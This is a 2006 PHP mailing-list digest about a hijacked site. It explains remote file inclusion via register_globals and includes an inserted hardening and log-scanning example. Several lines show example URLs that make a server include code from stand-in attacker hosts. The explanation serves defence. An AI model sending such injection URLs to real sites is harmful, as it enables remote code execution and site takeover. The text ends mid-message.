php-general Digest 14 Nov 2006 06:16:51 - Issue 4458
Topics (messages 244561 through 244583):
Re: Highjack?
244561 by: Matt Carlson
244562 by: Rory Browne
244563 by: bruce
Re: How do you do the ? mark after a filename
244564 by: Norbert Ehart
Scrolling text
244565 by: Alain Roger
244566 by: Robert Cummings
Re: one click - two actions?
244567 by: Mel
244569 by: Warren Vail
244571 by: Mel
244577 by: Warren Vail
Problem with PHP 5.2.0
244568 by: bluefx13.gmail.com
244580 by: Kevin Waterson
Re: Mysql strategy
244570 by: David Tulloh
244572 by: Robert Cummings
244578 by: Chris
244579 by: Larry Garfield
Compressing both php and linked css files with ob_gzhandler and htaccess
244573 by: Graham Anderson
244574 by: Jochem Maas
244575 by: Graham Anderson
244576 by: Graham Anderson
Re: server side security
244581 by: Chris
244582 by: Ligaya A. Turmelle
Re: problem with php[4,5] (horde 2/3)
244583 by: Chris
Administrivia:
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
php-general@lists.php.net
--
---BeginMessage---
With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST)
are automatically populated into variables. With that in mind
www.example.com/index.php?path=remoteexploit.com/ would then yield
include('remoteexploit.com/foo'); thus including ANY code they wish.
- Original Message
From: bruce [EMAIL PROTECTED]
To: Eric Butera [EMAIL PROTECTED]; tedd [EMAIL PROTECTED]
Cc: PHP General List php-general@lists.php.net
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE: [PHP] Highjack?
eric...
you say "how embarrassing" regarding the $path.'foo'. I'm curious, why/how is
this simple piece of code exploitable? Assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...
thoughts/explanations...
thanks
-Original Message-
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?
On 11/13/06, tedd [EMAIL PROTECTED] wrote:
Hi gang:
While this is not an obvious php question, it does deal with security
which is a concern.
Just this morning had a couple of my sites highjacked. What I found
was someone had replaced my root level index.php with their own
index.php. You can see the result at:
http://xn--u2g.com/index1.php
It was not a terrible loss nor inconvenience, but I wonder how they
did it. Any ideas how this was done and suggestions as to how to
prevent this from happening again?
Thanks,
tedd
--
---
http://sperling.com http://ancientstones.com http://earthstones.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Tedd,
I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project. I'd say the first thing would be to try and
find any include/require statements that are exploitable. In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.
If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
---End Message---
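The pattern the thread is describing, as an added example that is not code from any poster: the register_globals-driven include is shown as a comment, followed by a hardened replacement that maps the request value onto a fixed allow-list, and a small check for the kind of access-log lines Eric suggests searching for. The allow-list entries, the `modules/` directory, the function names and the sample log lines are all constructed for this illustration.

```php
<?php
// Added example for the register_globals / remote-include problem discussed
// in the thread. Not code from the thread; allow-list entries, directory
// names and the access-log lines below are constructed for illustration.

// ---- The vulnerable shape (shown only as a comment, never run) ----------
//   include($path . 'script.php');
// With register_globals=On, a request to
//   /index.php?path=http://evil.example.com/x.txt?dummy=
// sets $path before the include runs, and with allow_url_fopen=On
// (PHP < 5.2) or allow_url_include=On (5.2+) the include fetches and
// executes http://evil.example.com/x.txt?dummy=script.php. The trailing
// "?dummy=" turns the appended 'script.php' into a harmless query string.

// ---- Hardened replacement: never build an include path from input -------
const INCLUDE_ROOT  = __DIR__ . '/modules';                // assumed layout
const ALLOWED_PATHS = ['default', 'admin', 'reports'];     // assumed names

/**
 * Map an untrusted "path" value to a file under INCLUDE_ROOT, or null.
 * The request value is only ever used as a key into a fixed list, so a
 * URL or a ../ sequence can never reach include().
 */
function resolve_include(string $requested): ?string
{
    if (!in_array($requested, ALLOWED_PATHS, true)) {
        return null;
    }
    $root = realpath(INCLUDE_ROOT);
    $file = realpath(INCLUDE_ROOT . '/' . $requested . '/script.php');
    // realpath() follows symlinks and collapses ../, so the prefix check
    // is made on the real location rather than on the string we built.
    if ($root === false || $file === false
        || strpos($file, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

/** Read the value from $_GET explicitly instead of relying on register_globals. */
function load_module(array $get): bool
{
    $requested = (isset($get['path']) && is_string($get['path'])) ? $get['path'] : 'default';
    $file = resolve_include($requested);
    if ($file === null) {
        http_response_code(400);
        return false;
    }
    require $file;
    return true;
}

// ---- Log check: the URLs Eric suggests searching for --------------------
/**
 * True when a combined-format access-log line carries a query-string value
 * that is itself a URL (http://, https://, ftp://, php://, data:), which is
 * the signature of a remote-include attempt. Percent-encoding is undone
 * first so ?path=http%3A%2F%2Fevil... is caught as well.
 */
function looks_like_rfi(string $logLine): bool
{
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+)/', $logLine, $m)) {
        return false;
    }
    $pos = strpos($m[1], '?');
    if ($pos === false) {
        return false;
    }
    $decoded = rawurldecode(substr($m[1], $pos + 1));
    return (bool) preg_match('~(?:^|&)[^=&]*=\s*(?:https?|ftp|php|data):~i', $decoded);
}

// Constructed sample lines (not from any real server).
$sample = [
    '203.0.113.7 - - [13/Nov/2006:09:39:12 -0500] "GET /index.php?path=http://evil.example.com/inject.txt?dummy= HTTP/1.0" 200 512',
    '203.0.113.7 - - [13/Nov/2006:09:39:13 -0500] "GET /exploited.php?action=http%3A%2F%2Fevil.example.com%2Finject.txt HTTP/1.1" 200 512',
    '198.51.100.2 - - [13/Nov/2006:09:40:01 -0500] "GET /index.php?path=reports HTTP/1.1" 200 2048',
];
foreach ($sample as $line) {
    echo looks_like_rfi($line) ? 'SUSPECT: ' : 'ok:      ', $line, "\n";
}
```

Run it with `php example.php`: the first two constructed lines are flagged and the third is not. The allow-list approach is the important part; turning register_globals off (and allow_url_include off on 5.2+) removes this particular injection route, but an include whose path is assembled from request data stays fragile, so the value should only ever select from a list the script owns.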
---BeginMessage---
-- Forwarded message --
From: Rory Browne [EMAIL PROTECTED]
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]
On 11/13/06, bruce [EMAIL PROTECTED] wrote:
eric...
you say "how embarrassing" regarding the $path.'foo'. I'm curious, why/how is
this simple piece of code exploitable? Assuming $path is not something that
comes via the url vars (GET/POST/REQUEST)
If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php
it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...
thoughts/explanations...
thanks
-Original Message-
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP]